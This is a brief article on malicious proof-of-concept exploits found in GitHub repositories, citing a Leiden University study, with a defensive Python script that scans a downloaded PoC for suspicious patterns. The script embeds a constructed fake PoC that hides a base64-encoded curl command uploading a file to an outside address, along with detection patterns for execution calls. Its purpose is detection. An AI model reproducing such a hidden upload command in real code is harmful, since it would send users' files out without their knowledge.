Malware in POC on GitHub

A proof of concept (POC) helps reproduce a vulnerability, but there is no guarantee that its source is reliable. Some are fake, and some contain malicious code. Using a heuristic approach, a study found that 4,893 of the 47,313 GitHub repositories it examined may have malicious intent.

The malicious POCs may contain malware able to attack the local host or an exfiltration script to export information somewhere else. Sometimes they are just a prank.
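
One way to triage a downloaded POC before running it is sketched below, as an added example that is not code from this page or from the study. The three heuristics (hardcoded non-lab IPs, dynamic execution calls, base64 blobs that decode to text) are assumptions chosen for illustration, not the study's method, and the sample POC and its `203.0.113.7` address are constructed.

```python
import base64
import binascii
import ipaddress
import re

# Constructed sample: a fake "PoC" that hides an upload command in base64.
_HIDDEN = base64.b64encode(b"curl -s http://203.0.113.7/collect -d @report.txt").decode()
SAMPLE_POC = f'''import os, base64
TARGET = "192.168.1.10"  # lab target supplied by the user
def exploit():
    os.system(base64.b64decode("{_HIDDEN}").decode())
'''

# Assumption: addresses in these ranges are the analyst's own lab or loopback.
LAB_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
B64 = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
EXEC = re.compile(r"\b(?:eval|exec|os\.system|subprocess\.\w+)\s*\(")

def external_ips(text):
    """Hardcoded IPv4 literals outside the lab ranges in LAB_NETS."""
    found = []
    for literal in IPV4.findall(text):
        try:
            ip = ipaddress.ip_address(literal)
        except ValueError:        # e.g. 999.1.1.1
            continue
        if not any(ip in net for net in LAB_NETS):
            found.append(literal)
    return found

def triage(source, depth=0):
    """Return (kind, detail) findings; decodes base64 blobs and rescans them."""
    tag = "decoded:" if depth else ""
    findings = [(tag + "external-ip", ip) for ip in external_ips(source)]
    findings += [(tag + "dynamic-exec", m.group(0)) for m in EXEC.finditer(source)]
    if depth < 2:                 # bound recursion on nested encodings
        for blob in B64.findall(source):
            try:
                text = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue          # not base64, or decodes to binary
            findings.append((tag + "base64-text", text))
            findings += triage(text, depth + 1)
    return findings

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_POC):
        print(f"{kind:22} {detail}")
```

A finding is a reason to read the file before running it, not a verdict; the external address in the sample only becomes visible after the base64 string is decoded and rescanned.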

Full study: Soufian El Yadmani, Robin The, Olga Gadyatskaya (2022) How security professionals are being attacked: A study of malicious CVE proof of concept exploits in GitHub. Leiden Institute of Advanced Computer Science, Leiden University